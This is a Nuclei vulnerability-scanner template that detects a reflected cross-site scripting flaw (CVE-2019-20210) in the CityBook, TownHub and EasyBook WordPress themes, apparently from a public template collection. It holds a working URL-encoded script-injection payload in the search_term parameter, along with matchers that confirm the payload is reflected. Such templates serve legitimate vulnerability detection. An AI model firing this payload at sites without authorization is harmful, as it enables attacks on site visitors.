nuclei-templates/http/cves/2019/CVE-2019-20210.yaml

56 lines
2.1 KiB
YAML

id: CVE-2019-20210
info:
name: WordPress CTHthemes - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
impact: |
Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system.
remediation: |
Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability.
reference:
- https://wpscan.com/vulnerability/10013
- https://wpvulndb.com/vulnerabilities/10018
- https://cxsecurity.com/issue/WLB-2019120112
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
- https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-20210
cwe-id: CWE-79
epss-score: 0.00822
epss-percentile: 0.7991
cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: cththemes
product: citybook
framework: wordpress
tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss,cththemes
http:
- method: GET
path:
- "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- "/wp-content/themes/citybook"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450220155b5a18fbc72f8d315116bf52dbb2a0139eb3f897b94d9fadb62e17937241d2022100a6f1e178cc9eef7981214de7c948bbed9d5ab68d73c67bf89d52c3f436b0db72:922c64590222798bb761d5b6d8e72950